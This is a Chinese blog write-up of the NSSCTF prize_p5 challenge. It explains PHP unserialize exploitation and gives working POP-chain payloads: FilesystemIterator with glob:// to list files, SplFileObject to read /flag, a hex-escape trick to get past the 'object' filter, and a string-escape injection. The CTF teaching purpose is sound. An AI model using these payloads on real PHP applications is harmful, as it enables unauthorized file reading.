NSSCTF-prize5

最新推荐文章于 2024-09-02 20:07:15 发布
最新推荐文章于 2024-09-02 20:07:15 发布
阅读量774 收藏 2
点赞数 1
分类专栏: CTF赛题复现 文章标签: 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/121111033
版权

题目

<?php
error_reporting(0);

class catalogue{
    public $class;
    public $data;
    public function __construct()
    {
        $this->class = "error";
        $this->data = "hacker";
    }
    public function __destruct()
    {
        echo new $this->class($this->data);
    }
}
class error{
    public function __construct($OTL)
    {
        $this->OTL = $OTL;
        echo ("hello ".$this->OTL);
    }
}
class escape{                                                                   
    public $name = 'OTL';                                                 
    public $phone = '123666';                                             
    public $email = 'sweet@OTL.com';                          
}
function abscond($string) {
    $filter = array('NSS', 'CTF', 'OTL_QAQ', 'hello');
    $filter = '/' . implode('|', $filter) . '/i';
    return preg_replace($filter, 'hacker', $string);
}
if(isset($_GET['cata'])){
    if(!preg_match('/object/i',$_GET['cata'])){
        unserialize($_GET['cata']);
    }
    else{
        $cc = new catalogue(); 
        unserialize(serialize($cc));           
    }    
    if(isset($_POST['name'])&&isset($_POST['phone'])&&isset($_POST['email'])){
        if (preg_match("/flag/i",$_POST['email'])){
            die("nonono,you can not do that!");
        }
        $abscond = new escape();
        $abscond->name = $_POST['name'];
        $abscond->phone = $_POST['phone'];
        $abscond->email = $_POST['email'];
        $abscond = serialize($abscond);
        $escape = get_object_vars(unserialize(abscond($abscond)));
        if(is_array($escape['phone'])){
        echo base64_encode(file_get_contents($escape['email']));
        }
        else{
            echo "I'm sorry to tell you that you are wrong";
        }
    }
}
else{
    highlight_file(__FILE__);
}
?>

非预期:

使用php原生类

重要代码:

if(!preg_match('/object/i',$_GET['cata'])){
        unserialize($_GET['cata']);
    }
else{
        $cc = new catalogue(); 
        unserialize(serialize($cc));           
    }

如果我们只get传参给cata而不post传参给name或phone或email,就只会执行这段代码;如果传入的cata中没有object字符串(不区分大小写),那么就会对我们传入的cata反序列化。

通过观察存在的类,发现catalogue类中

class catalogue{
    public $class;
    public $data;
    public function __construct()
    {
        $this->class = "error";
        $this->data = "hacker";
    }
    public function __destruct()
    {
        echo new $this->class($this->data);
    }
}

有一个析构函数的类可以直接利用外,没有其他可以使用。通过观察catalogue类的析构函数,是new一个新类,然后进行echo的操作即调用这个类的__toString()方法。这里可以直接联想到原生类的利用中目录读取文件的类DirectoryIterator类FilesystemIterator类以及GlobIterator类

参考:PHP 原生类的利用_cjdgg的博客-CSDN博客

构造POP链:

<?php
class catalogue{
    public $class;
    public $data;
    public function __construct()
    {
        $this->class = "FilesystemIterator";
        $this->data = "/";
    }
}

$a=new catalogue();
echo serialize($a);

结果:

O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:1:"/";}

payload:

?cata=O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:1:"/";}

这里只能回显一个文件。

那么读取想要的文件就需要配合glob协议使用,通过 * 号来匹配想要的文件名,即glob支持像linux一样使用*号来作为通配符来匹配字符

 构造POP链

<?php
class catalogue{
    public $class;
    public $data;
    public function __construct()
    {
        $this->class = "FilesystemIterator";
        $this->data = "glob:///*f*";
    }
}

$a=new catalogue();
echo serialize($a);

结果:

O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:11:"glob:///*f*";}

payload:

?cata=O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:11:"glob:///*f*";}

就可以发现有一个flag文件

知道文件名了,那么怎么读取内容呢?

这里使用SplFileObject类读取flag文件的内容

 构造POP链

<?php
class catalogue{
    public $class;
    public $data;
    public function __construct()
    {
        $this->class = "SplFileObject";
        $this->data = "/flag";
    }
}

$a=new catalogue();
echo serialize($a);

结果:

O:9:"catalogue":2:{s:5:"class";s:13:"SplFileObject";s:4:"data";s:5:"/flag";}

但是因为对object有过滤,所以我们需要绕过。这里一个小知识: 

当我们把s改成大写的S时候,字符串中的字符是可以使用反斜杠\加16进制替换的。大写O的16进制为4f,小写o的16进制为6f。大小写都可以绕过,因为php类名可以不区分大小写。

所以payload为:

?cata=O:9:"catalogue":2:{s:5:"class";S:13:"SplFile\4fbject";s:4:"data";s:5:"/flag";}

预期解:

字符串逃逸

payload:

?cata=CTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFhellohello";s:5:"phone";a:1:{i:0;i:1;}s:5:"email";s:5:"/flag";}

_Monica_
关注
专栏目录
NSSCTF—wp
XikX_eleven的博客
09-21 1289
NSSctf wpPrize Problem2 Prize Problem2 根基提示url加/1.zip,下载压缩包 下载速度很慢 做了限制 idm 多线程下载 拉满32
netflix-prize-exp:Netflix竞赛奖
05-21
netflix-prize-exp 使用netflix-prize数据集进行试验 项目文件夹布局 netflixFW:基于C ++构建的框架,用于处理Netflix的漂亮数据集。 一旦加载了所有必要的数据(电影数据库,用户数据库,探针数据库),就可以在...
NSSCTF prize_p5
qq_61142406的博客
05-26 423
源码 <?php error_reporting(0); class catalogue{ public $class; public $data; public function __construct() { $this->class = "error"; $this->data = "hacker"; } public function __destruct() { echo
[NSSCTF]prize_p1~p5五道题学习
m0_62422842的博客
08-11 1997
五道web题涉及到的知识点也比较多,总结一下便于今后学习
NSSCTF刷题
最新发布
2401_82388450的博客
09-02 973
1.在选中nisactf的时候,注释里面的内容也被标记了2.复制到010editer中发现存在不可见的字符3.我们选择实际的参名和字符串,并转为url编码格式4.得到最后的payload,传参得到flag。
nssctf刷题
weixin_63231007的博客
04-30 1133
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
NSSCTF reverse题目解析(详细版)持续更新
ZJPC007的博客
11-24 3161
附件是一个.py文件原代码的含义是将list[]数组进行操作得到一个key利用key和flag进行异或操作,得到16进制的result所以可以得到大致的逆向代码框架重点就是对以下语句进行逆向该语句的含义是keyhex()[2:]zfill(2)因此的到逆向语句这里要注意的就是16进制和字符间的转换int(string,16)的功能就是将16进制转为10进制因此得到完整的脚本。
h5-rotary-prize:信达证券-转盘抽奖活动页面
05-01
转盘抽奖活动页面 信达证券 效果图预览:
node-js-redeem-prize-project:用于通过用户注册和登录兑换奖品的后端API
02-16
本文将深入探讨一个名为“node-js-redeem-prize-project”的项目,它是一个用Node.js开发的后端API,主要用于用户注册、登录以及奖品兑换功能。通过理解并分析这个项目,我们可以学习到如何构建一个高效、安全且易于...
NPP-Nobel-Prize-Predictor:机器学习班项目
05-30
标题中的“NPP-Nobel-Prize-Predictor”是一个机器学习项目,旨在预测诺贝尔奖得主。这个项目由James Whang制作,并且基于GPL许可证发布,这意味着它遵循开源软件的原则,允许用户自由使用、修改和分发源代码。 ...
rocketmq-complie-prize.zip
07-09
rocketmq-cpp-client在ubuntu16.06编译要用到依赖源码都在此 具体操作参考 https://blog.csdn.net/chenhuaijin123/article/details/95208257
NSSCTF
weixin_43896504的博客
07-22 2779
NSSCTF
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1189
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥
Aluxian_的博客
05-01 2270
第十二张图: 新闻联播 一般我晚上 7点或者19.00。第一张图:20%和80% 猜测可能是 28或82。第三张图:而立之年 30而立嘛 肯是30。第二张图:一张八卦图 猜测是08。第六张图:飞机歼-20 20。第七张图:两只黄鹂鸣翠柳 02。第八张图:一起去看流星雨 17。第四张图:北斗七星图 07。第五张图:江南四大才子 04。第十一张图:12星座 12。第十张图:一马当先 01。第九张图:乔丹 23。
NSSCTF做题
wwwwyyyrre的博客
09-24 653
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
一些简单的NSSCTF的web wp(SPWU篇)
2303_79513877的博客
03-17 751
另:若遇到===这样的强类型比较,方法一就失效了,方法二仍然有效,或者还可以使用软件fastcoll进行md5碰撞,生成两个字符串使得他们的md5值相同。方法一: 可以使用带0e开头的数字穿进行传递参数,因为php会将0e开头的数字转化为0,故此时md5值相等,而两个变量值不相等;方法二: 可以传递数组,如name[]=123,password[]=456,md5不能加密数组,故两个md5返回的都是null。由题查看根目录下文件,查看f…可以发现此时判断md5值是否一样用的是==,这是php的弱类型比较,
CTF php反序列化总结
m0_53567065的博客
11-17 4742
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
记一道CTF反序列化
Peithon的博客
05-28 9618
0x00 使用burpsuite抓包,在URL上发现有用信息 发现key=123对应一个hash值,该hash的值通过md5解密得到kkkkkk01123,如果我们不是123那么就可以get到flag,构造kkkkkk01456,将其MD5加密,得到2a5414055268d6f1f82288af38e5ce4e,将key和hash替换,构造 index.php?key=456&amp;amp;h...
有 title、quality、salary、prize 等属性。显示这些属性,并计算 salary、prize 之和。
05-25
好的,以下是 title、quality、salary、prize 属性的展示: - title:职称 - quality:绩效 - salary:工资 - prize:奖金 现在假设有以下三个员工的信息: 员工1: - title:高级工程师 - quality:A+ - salary:10000 - prize:5000 员工2: - title:中级工程师 - quality:B+ - salary:8000 - prize:3000 员工3: - title:初级工程师 - quality:C+ - salary:5000 - prize:1000 那么,员工的信息及 salary、prize 之和如下: 员工1: - title:高级工程师 - quality:A+ - salary:10000 - prize:5000 员工2: - title:中级工程师 - quality:B+ - salary:8000 - prize:3000 员工3: - title:初级工程师 - quality:C+ - salary:5000 - prize:1000 salary、prize 之和: 员工1:10000 + 5000 = 15000 员工2:8000 + 3000 = 11000 员工3:5000 + 1000 = 6000 总和:15000 + 11000 + 6000 = 32000
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值